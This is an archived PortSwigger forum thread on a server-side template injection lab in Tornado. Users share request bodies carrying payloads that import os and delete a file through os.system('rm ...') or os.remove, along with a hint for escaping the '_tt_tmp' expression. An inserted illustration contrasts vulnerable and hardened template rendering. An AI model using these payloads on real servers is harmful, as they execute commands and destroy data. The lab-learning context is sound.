The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Hey, I'm having an error when launching payload

a | Last updated: Apr 17, 2020 06:30PM UTC

The name of the challenge: Basic server-side template injection (code context)

Request 1:

POST /my-account/change-blog-post-author-display HTTP/1.1
Host: <lab token>.web-security-academy.net
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<lab token>.web-security-academy.net/my-account?id=wiener
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
Connection: close
Cookie: session=cookie
Upgrade-Insecure-Requests: 1

blog-post-author-display={% import os%}{{os.system('rm /home/carlos/morale.txt')}}&csrf=token

Request 2: go to the post and add a comment.

The payload will work in the name, but when calling his office <example os > specifically, an error comes up:

No handlers could be found for logger "tornado.application"
Traceback (most recent call last):
  File "<string>", line 15, in <module>
  File "/usr/lib/python2.7/dist-packages/tornado/template.py", line 317, in __init__
    "exec", dont_inherit=True)
  File "<string>.generated.py", line 5
    _tt_tmp = % import os%}{{os.system('rm /home/carlos/morale.txt')  # <string>:1
              ^
SyntaxError: invalid syntax

17 April 2020

When some syntax is executed, it works successfully, like printing, reading files, etc.

Thanks in advance.

a | Last updated: Apr 18, 2020 02:04PM UTC

The solution was done

Majid | Last updated: Apr 18, 2020 05:42PM UTC

Hi, stuck in the same situation for 3 hours. Any hint?

a | Last updated: Apr 19, 2020 12:03PM UTC

Close the _tt_tmp = and add the payload.


Michelle, PortSwigger Agent | Last updated: Apr 20, 2020 09:46AM UTC

We'll post the solutions when the first 10 users have solved all the new labs. In the meantime, keep trying and have fun!

Wade | Last updated: Apr 22, 2020 02:12PM UTC

Same issue here. I tried basically the same payload, except I did:

blog-post-author-display={%+import+os%}{{os.remove(/home/carlos/morale.txt)}}&csrf=token

and a bunch of variants like:

{{import+os%3b+os.remove(/home/carlos/morale.txt}}

_tt_tmp=payload works for 7*7 but not for removing the file. The offending lines here (https://github.com/tornadoweb/tornado/blob/master/tornado/template.py) seem to be 325-329. Thanks Michelle.
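The posts above keep running into the "_tt_tmp =" line of Tornado's generated code. The snippet below is an added illustration, written for this thread and not part of it, and it is a hypothetical mini renderer rather than Tornado's own template.py: it mimics the one detail the traceback exposes (each {{ expr }} is turned into a Python statement "_tt_tmp = expr" and compiled), shows why user text pasted into the template source becomes code, and places the hardened pattern next to it (constant template text, user data passed in as a context value, expressions restricted to plain variable lookups). The function names render_unsafe, render_safe, template_is_static, carries_template_syntax and flagged_fields, and the SAMPLE_FIELDS values, are all made up here; the 7*7 probe and the blog-post-author-display field name come from the thread.

```python
import re

# Matches a Tornado-style expression block: {{ expr }}
EXPR = re.compile(r"\{\{\s*(.*?)\s*\}\}")


def render_unsafe(template_source, context):
    """Vulnerable pattern: every {{ expr }} is compiled and executed as Python.

    The generated line has the same shape as the "_tt_tmp = ..." line in the
    traceback quoted in this thread. Builtins are stripped only so that this
    demo stays inert; that is NOT a sandbox, and a real engine keeps builtins.
    """
    def evaluate(match):
        generated = "_tt_tmp = " + match.group(1)  # untrusted text reaches the compiler
        scope = {"__builtins__": {}}
        scope.update(context)
        exec(generated, scope)
        return str(scope["_tt_tmp"])
    return EXPR.sub(evaluate, template_source)


def template_is_static(template_source):
    """Review check: True only if every {{ }} block is a bare variable name."""
    return all(m.group(1).isidentifier() for m in EXPR.finditer(template_source))


def render_safe(template_source, context):
    """Hardened pattern: {{ name }} is a dictionary lookup, never evaluation."""
    if not template_is_static(template_source):
        raise ValueError("template contains a non-trivial expression; refusing to render")
    return EXPR.sub(lambda m: str(context[m.group(1)]), template_source)


def vulnerable_author_line(display_name):
    """The bug class behind the lab: user input concatenated INTO the template source."""
    return render_unsafe("Author: {{ " + display_name + " }}", {})


def fixed_author_line(display_name):
    """The fix: template text is constant; user input is data bound at render time."""
    return render_safe("Author: {{ author }}", {"author": display_name})


# Detection side: form values carrying template delimiters are worth logging.
TEMPLATE_DELIMS = re.compile(r"\{\{|\{%|\$\{|<%")


def carries_template_syntax(value):
    return TEMPLATE_DELIMS.search(value) is not None


def flagged_fields(fields):
    """Names of submitted fields whose values contain template syntax."""
    return sorted(name for name, value in fields.items() if carries_template_syntax(value))


# Constructed sample, modelled on the request body posted in this thread.
SAMPLE_FIELDS = {
    "blog-post-author-display": "{{7*7}}",
    "csrf": "token",
}


if __name__ == "__main__":
    print(vulnerable_author_line("7*7"))   # the probe is evaluated: Author: 49
    print(fixed_author_line("7*7"))        # the probe stays text:    Author: 7*7
    print(flagged_fields(SAMPLE_FIELDS))   # ['blog-post-author-display']
```

The contrast is the whole point: in vulnerable_author_line the display name becomes part of the template source, so it is compiled like the rest of the template, while fixed_author_line only ever compiles a constant string and treats the display name as a value. template_is_static is the kind of check to put in code review or a test suite for any template source that is assembled at runtime, and flagged_fields is a cheap server-side hook for spotting probes like the 7*7 one in request logs.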

Peter | Last updated: Apr 23, 2020 02:12AM UTC